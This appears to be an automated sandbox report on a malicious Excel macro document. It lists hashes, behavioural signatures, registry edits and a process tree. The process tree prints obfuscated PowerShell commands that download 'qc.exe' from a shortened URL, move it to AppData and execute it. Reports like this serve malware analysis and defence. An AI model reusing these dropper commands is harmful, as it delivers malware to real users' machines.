Analysis
-
max time kernel
77s -
max time network
37s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
11-11-2020 01:50
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.Siggen2.64979.12090.18025.xls
Resource
win7v20201028
0 signatures
0 seconds
General
-
Target
SecuriteInfo.com.Exploit.Siggen2.64979.12090.18025.xls
-
Size
75KB
-
MD5
7ba7817848e5d33a4f5b301b075120d8
-
SHA1
eacf413cf0b6db5ae2f36149dfd2792812a257f7
-
SHA256
ccf9c52f4542aceff583c50226397e1f31630836f08ab40759e01eeaa5538ef4
-
SHA512
06f71b6209b5091f6a16196757b8e3d973872f50d67641dbbd020a500baf19ef8ae018980529a841cb44ba2674e75bd1723605e6ec4a163093523fec389fe8a8
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://cutt.ly/XgX89zi
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1504 336 cmd.exe 24 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1192 336 cmd.exe 24 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 520 336 cmd.exe 24 -
Blacklisted process makes network request 2 IoCs
flow pid Process 6 1720 powershell.exe 8 1720 powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 336 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1460 powershell.exe 572 powershell.exe 1720 powershell.exe 572 powershell.exe 1720 powershell.exe 1460 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1720 powershell.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 572 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 336 EXCEL.EXE 336 EXCEL.EXE 336 EXCEL.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 336 wrote to memory of 1504 336 EXCEL.EXE 29 PID 336 wrote to memory of 1504 336 EXCEL.EXE 29 PID 336 wrote to memory of 1504 336 EXCEL.EXE 29 PID 336 wrote to memory of 1504 336 EXCEL.EXE 29 PID 336 wrote to memory of 1192 336 EXCEL.EXE 30 PID 336 wrote to memory of 1192 336 EXCEL.EXE 30 PID 336 wrote to memory of 1192 336 EXCEL.EXE 30 PID 336 wrote to memory of 1192 336 EXCEL.EXE 30 PID 336 wrote to memory of 520 336 EXCEL.EXE 32 PID 336 wrote to memory of 520 336 EXCEL.EXE 32 PID 336 wrote to memory of 520 336 EXCEL.EXE 32 PID 336 wrote to memory of 520 336 EXCEL.EXE 32 PID 1504 wrote to memory of 1720 1504 cmd.exe 35 PID 1504 wrote to memory of 1720 1504 cmd.exe 35 PID 1504 wrote to memory of 1720 1504 cmd.exe 35 PID 1504 wrote to memory of 1720 1504 cmd.exe 35 PID 520 wrote to memory of 572 520 cmd.exe 37 PID 520 wrote to memory of 572 520 cmd.exe 37 PID 520 wrote to memory of 572 520 cmd.exe 37 PID 520 wrote to memory of 572 520 cmd.exe 37 PID 1192 wrote to memory of 1460 1192 cmd.exe 36 PID 1192 wrote to memory of 1460 1192 cmd.exe 36 PID 1192 wrote to memory of 1460 1192 cmd.exe 36 PID 1192 wrote to memory of 1460 1192 cmd.exe 36
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.64979.12090.18025.xls1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:336 -
C:\Windows\SysWOW64\cmd.execmd /cpowe^rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"(('https://cutt.ly/XgX89zi'),'qc.exe')2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"(('https://cutt.ly/XgX89zi'),'qc.exe')3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /cpowe^rshell -w 1 stARt`-slE`Ep 20; Move-Item "qc.exe" -Destination "${enV`:appdata}"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 20; Move-Item "qc.exe" -Destination "${enV`:appdata}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /cpowe^rshell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./qc.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./qc.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572
-
-